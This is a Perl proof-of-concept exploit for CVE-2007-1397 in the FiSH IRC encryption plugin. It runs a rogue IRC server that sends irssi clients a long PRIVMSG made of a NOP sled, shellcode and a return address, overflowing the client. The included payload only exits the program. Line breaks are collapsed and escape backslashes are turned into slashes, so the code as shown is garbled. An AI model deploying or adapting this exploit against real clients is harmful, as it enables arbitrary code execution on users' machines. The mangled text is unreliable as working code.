# FiSH IRC encryption evil ircd PoC exploit.# Abuses CVE-2007-1397# Bad ircd, nasty bnc provider, nicknames over 100 char --> ruin.# Runs arbitrary code which which in this case shuts down irssi.# Tested on my own compiled FiSH with irssi/fedora/x86# There are a lot more problems like this one, you should /unload fish# Caleb James DeLisle - cjduse Socket;$retPtr = "/x60/xef/xff/xbf";# Pirated from some guy called gunslinger_$exit1code = "/x31/xc0/xb0/x01/x31/xdb/xcd/x80";$code = "/x90" x 120 . $exit1code . $retPtr;socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "Couldn't open socket";bind(SOCKET, sockaddr_in(6667, inet_aton("127.0.0.1"))) or die "Couldn't bind to port 6667";listen(SOCKET,5) or die "Couldn't listen on port";while(accept(CLIENT,SOCKET)){    sleep 1;    select((select(CLIENT), $|=1)[0]);    print CLIENT ":-psyBNC!~cjd/@ef.net PRIVMSG luser : :($code/r/n";}close(SOCKET);